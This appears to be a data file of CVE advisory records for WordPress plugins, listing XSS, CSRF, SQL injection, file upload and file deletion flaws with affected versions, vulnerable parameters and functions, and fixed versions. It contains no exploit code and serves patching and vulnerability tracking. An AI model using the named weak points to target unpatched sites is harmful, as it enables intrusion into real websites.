{"CVE_ID":"CVE-2023-5381","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.7","versionEndExcluding":"1.12.8","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 1.12.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.12.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd2bc2e7-960e-40db-9dcc-a6a60117bd83?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd2bc2e7-960e-40db-9dcc-a6a60117bd83?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/inc\\\/admin\\\/admin-ui.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/inc\\\/admin\\\/admin-ui.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2996185%40addon-elements-for-elementor-page-builder%2Ftrunk&old=2980987%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2996185%40addon-elements-for-elementor-page-builder%2Ftrunk&old=2980987%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4723","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.7","versionEndExcluding":"1.12.8","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.12.7 via the ajax_eae_post_data function. This can allow unauthenticated attackers to extract sensitive data including post\/page ids and titles including  those of with pending\/draft\/future\/private status.","recommendation":"Update to version 1.12.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89489218-263f-4157-a5cd-a12bc6a0dfe6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89489218-263f-4157-a5cd-a12bc6a0dfe6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/classes\\\/helper.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/classes\\\/helper.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2996185%40addon-elements-for-elementor-page-builder%2Ftrunk&old=2980987%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2996185%40addon-elements-for-elementor-page-builder%2Ftrunk&old=2980987%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4690","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.7","versionEndExcluding":"1.12.8","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.12.7. This is due to missing or incorrect nonce validation on the eae_save_config function. This makes it possible for unauthenticated attackers to change configuration settings for the plugin via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.12.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd53b4e1-c6b7-4111-911a-04b14c7a9c4e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd53b4e1-c6b7-4111-911a-04b14c7a9c4e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/inc\\\/admin\\\/admin-ui.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/inc\\\/admin\\\/admin-ui.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2996185%40addon-elements-for-elementor-page-builder%2Ftrunk&old=2980987%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2996185%40addon-elements-for-elementor-page-builder%2Ftrunk&old=2980987%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4689","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.7","versionEndExcluding":"1.12.8","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.12.7. This is due to missing or incorrect nonce validation on the eae_save_elements function. This makes it possible for unauthenticated attackers to enable\/disable elementor addon elements via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.12.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/472cdbc4-3bfa-4254-b35a-be7ae10782e6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/472cdbc4-3bfa-4254-b35a-be7ae10782e6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/inc\\\/admin\\\/admin-ui.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/inc\\\/admin\\\/admin-ui.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2996185%40addon-elements-for-elementor-page-builder%2Ftrunk&old=2980987%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2996185%40addon-elements-for-elementor-page-builder%2Ftrunk&old=2980987%40addon-elements-for-elementor-page-builder%2Ftrunk&sfp_email=&sfph_mail=#file15\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1935","slug":"rafflepress","versionImpact":"1.12.5","versionEndExcluding":"1.12.7","description":"The Giveaways and Contests by RafflePress \u2013 Get More Website Traffic, Email Subscribers, and Social Followers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018parent_url\u2019 parameter in all versions up to, and including, 1.12.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.12.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29b471ac-3a08-42da-9907-670c3b3bae92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/29b471ac-3a08-42da-9907-670c3b3bae92?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rafflepress\\\/tags\\\/1.12.5\\\/resources\\\/views\\\/rafflepress-giveaway.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rafflepress\\\/tags\\\/1.12.5\\\/resources\\\/views\\\/rafflepress-giveaway.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/rafflepress\\\/tags\\\/1.12.5&old=3043286&new_path=\\\/rafflepress\\\/tags\\\/1.12.7&new=3043286&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/rafflepress\\\/tags\\\/1.12.5&old=3043286&new_path=\\\/rafflepress\\\/tags\\\/1.12.7&new=3043286&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2744","slug":"erp","versionEndExcluding":"1.12.4","description":"The ERP WordPress plugin before 1.12.4 does not properly sanitise and escape the `type` parameter in the `erp\/v1\/accounting\/v1\/people` REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.","recommendation":"Update to version 1.12.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/435da8a1-9955-46d7-a508-b5738259e731\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/435da8a1-9955-46d7-a508-b5738259e731\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2743","slug":"erp","versionEndExcluding":"1.12.4","description":"The ERP WordPress plugin before 1.12.4 does not sanitise and escape the employee_name parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/517c6aa4-a56d-4f13-b370-7c864dd9c7db\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/517c6aa4-a56d-4f13-b370-7c864dd9c7db\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-50427","slug":"surveyjs","versionImpact":"1.9.136","versionEndExcluding":"1.12.4","description":"Unrestricted Upload of File with Dangerous Type vulnerability in Devsoft Baltic O\u00dc SurveyJS: Drag & Drop WordPress Form Builder.This issue affects SurveyJS: Drag & Drop WordPress Form Builder: from n\/a through 1.9.136.","recommendation":"Update to version 1.12.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/surveyjs\\\/wordpress-surveyjs-plugin-1-9-136-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/surveyjs\\\/wordpress-surveyjs-plugin-1-9-136-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3815","slug":"surveyjs","versionImpact":"1.12.32","versionEndExcluding":"1.12.33","description":"The SurveyJS plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 1.12.32 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.12.33, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/surveyjs\\\/surveyjs-wordpress\",\"name\":\"https:\\\/\\\/github.com\\\/surveyjs\\\/surveyjs-wordpress\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/surveyjs\\\/surveyjs-wordpress\\\/commit\\\/6c332319c82c32d7148f77ed7ee20a9c6a5dc179\",\"name\":\"https:\\\/\\\/github.com\\\/surveyjs\\\/surveyjs-wordpress\\\/commit\\\/6c332319c82c32d7148f77ed7ee20a9c6a5dc179\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/surveyjs\\\/trunk\\\/initializer.php#L165\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/surveyjs\\\/trunk\\\/initializer.php#L165\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/surveyjs.io\\\/stay-updated\\\/release-notes\",\"name\":\"https:\\\/\\\/surveyjs.io\\\/stay-updated\\\/release-notes\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4285590-9c2f-4189-8b47-09378d8a2432?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4285590-9c2f-4189-8b47-09378d8a2432?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6565","slug":"iwp-client","versionEndExcluding":"1.12.3.1","description":"The InfiniteWP Client plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.12.3 via the multi-call backup option. This makes it possible for unauthenticated attackers to extract sensitive data from a temporary SQL file via repeated GET requests during the limited time window of the backup process.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fdc32a4-adf8-4174-924b-5d0b763d010c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2fdc32a4-adf8-4174-924b-5d0b763d010c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3007309\\\/iwp-client\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3007309\\\/iwp-client\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5049","slug":"rafflepress","versionImpact":"1.12.0","versionEndExcluding":"1.12.2","description":"The Giveaways and Contests by RafflePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rafflepress' and 'rafflepress_gutenberg' shortcode in versions up to, and including, 1.12.0 due to insufficient input sanitization and output escaping on 'giframe' user supplied attribute. This makes it possible for authenticated attackers with contributor level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.12.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6d663a9-3185-4c36-b9d1-878297965379?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6d663a9-3185-4c36-b9d1-878297965379?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rafflepress\\\/tags\\\/1.11.4\\\/app\\\/rafflepress.php#L955\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rafflepress\\\/tags\\\/1.11.4\\\/app\\\/rafflepress.php#L955\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2976620\\\/rafflepress#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2976620\\\/rafflepress#file0\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rafflepress\\\/tags\\\/1.11.4\\\/app\\\/rafflepress.php#L796\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rafflepress\\\/tags\\\/1.11.4\\\/app\\\/rafflepress.php#L796\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12544","slug":"surveyjs","versionImpact":"1.12.17","versionEndExcluding":"1.12.18","description":"The SurveyJS: Drag & Drop WordPress Form Builder to create, style and embed multiple forms of any complexity plugin for WordPress is vulnerable to arbitrary file deletion due to a missing capability check on the callback function of the SurveyJS_DeleteFile class in all versions up to, and including, 1.12.17. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). This function is still vulnerable to Cross-Site Request Forgery as of 1.12.20.","recommendation":"Update to version 1.12.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214665\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214665\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222216\\\/surveyjs\\\/trunk\\\/ajax_handlers\\\/delete_file.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222216\\\/surveyjs\\\/trunk\\\/ajax_handlers\\\/delete_file.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9404fe4-855e-4eb4-81c4-5246f6e9be0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9404fe4-855e-4eb4-81c4-5246f6e9be0c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10107","slug":"rafflepress","versionImpact":"1.12.16","versionEndExcluding":"1.12.17","description":"The Giveaways and Contests by RafflePress  WordPress plugin before 1.12.17 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.12.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83590cad-6bfb-4dc7-b8fd-aecbc66f3c33\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/83590cad-6bfb-4dc7-b8fd-aecbc66f3c33\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6887","slug":"rafflepress","versionImpact":"1.12.16","versionEndExcluding":"1.12.17","description":"The Giveaways and Contests by RafflePress  WordPress plugin before 1.12.16 does not sanitise and escape some of its Giveaways settings, which could allow high privilege users such as editor and above to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.12.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/553806f4-da20-433c-8c19-35e6c87ccade\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/553806f4-da20-433c-8c19-35e6c87ccade\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3963","slug":"rafflepress","versionImpact":"1.12.13","versionEndExcluding":"1.12.14","description":"The Giveaways and Contests by RafflePress  WordPress plugin before 1.12.14 does not sanitise and escape some parameters, which could allow users with a role as low as editor to perform Cross-Site Scripting attacks","recommendation":"Update to version 1.12.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/827d738e-5369-431e-8438-b5c4d8c1f8f1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/827d738e-5369-431e-8438-b5c4d8c1f8f1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0834","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.11","versionEndExcluding":"1.12.12","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the link_to parameter in all versions up to, and including, 1.12.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.12.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ebb5654-ba3e-4f18-8720-a6595a771964?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ebb5654-ba3e-4f18-8720-a6595a771964?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/price-table\\\/widgets\\\/price-table.php#L784\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/trunk\\\/modules\\\/price-table\\\/widgets\\\/price-table.php#L784\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3031349%40addon-elements-for-elementor-page-builder&new=3031349%40addon-elements-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3031349%40addon-elements-for-elementor-page-builder&new=3031349%40addon-elements-for-elementor-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2916","slug":"iwp-client","versionEndExcluding":"1.12.1","description":"The InfiniteWP Client plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.11.1 via the 'admin_notice' function. This can allow authenticated attackers with subscriber-level permissions or above to extract sensitive data including configuration. It can only be exploited if the plugin has not been configured yet. If combined with another arbitrary plugin installation and activation vulnerability, it may be possible to connect a site to InfiniteWP which would make remote management possible and allow for elevation of privileges.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iwp-client\\\/tags\\\/1.11.1\\\/core.class.php#L365\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iwp-client\\\/tags\\\/1.11.1\\\/core.class.php#L365\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925897\\\/iwp-client#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925897\\\/iwp-client#file4\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa157c80-447f-4406-9e49-9cc6208b7b19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa157c80-447f-4406-9e49-9cc6208b7b19?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13359","slug":"product-input-fields-for-woocommerce","versionImpact":"1.12.0","versionEndExcluding":"1.12.1","description":"The Product Input Fields for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the add_product_input_fields_to_order_item_meta() function in all versions up to, and including, 1.12.1. This may make it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Please note that by default the plugin is only vulnerable to a double extension file upload attack, unless an administrators leaves the accepted file extensions field blank which can make .php file uploads possible.","recommendation":"Update to version 1.12.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-input-fields-for-woocommerce\\\/tags\\\/-1.8.2\\\/includes\\\/class-alg-wc-pif-main.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-input-fields-for-woocommerce\\\/tags\\\/-1.8.2\\\/includes\\\/class-alg-wc-pif-main.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3234567%40product-input-fields-for-woocommerce&new=3234567%40product-input-fields-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3234567%40product-input-fields-for-woocommerce&new=3234567%40product-input-fields-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3250201%40product-input-fields-for-woocommerce&new=3250201%40product-input-fields-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3250201%40product-input-fields-for-woocommerce&new=3250201%40product-input-fields-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9c08f2e-bffd-40a6-89f3-559cb34f4395?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9c08f2e-bffd-40a6-89f3-559cb34f4395?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9357","slug":"xili-tidy-tags","versionImpact":"1.12.04","versionEndExcluding":"1.12.05","description":"The xili-tidy-tags plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'action' parameter in all versions up to, and including, 1.12.04 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.12.05, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28fd9f64-4451-46fd-bdeb-cc5a538ea563?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28fd9f64-4451-46fd-bdeb-cc5a538ea563?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xili-tidy-tags\\\/tags\\\/1.12.04\\\/xili-includes\\\/class-xili-tidy-tags-admin.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xili-tidy-tags\\\/tags\\\/1.12.04\\\/xili-includes\\\/class-xili-tidy-tags-admin.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/xili-tidy-tags\\\/tags\\\/1.12.04&new_path=\\\/xili-tidy-tags\\\/tags\\\/1.12.05&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/xili-tidy-tags\\\/tags\\\/1.12.04&new_path=\\\/xili-tidy-tags\\\/tags\\\/1.12.05&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11299","slug":"memberpress","versionImpact":"1.11.37","versionEndExcluding":"1.12.0","description":"The Memberpress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.11.37 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 1.12.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/memberpress.com\\\/change-log\\\/#1.12.0\",\"name\":\"https:\\\/\\\/memberpress.com\\\/change-log\\\/#1.12.0\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/787cd2bb-489f-471a-82e0-073b4766b45a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/787cd2bb-489f-471a-82e0-073b4766b45a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11362","slug":"peachpay-for-woocommerce","versionImpact":"1.112.0","versionEndExcluding":"1.113.0","description":"The Payments Plugin and Checkout Plugin for WooCommerce: Stripe, PayPal, Square, Authorize.net plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.112.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.113.0, or a newer patched 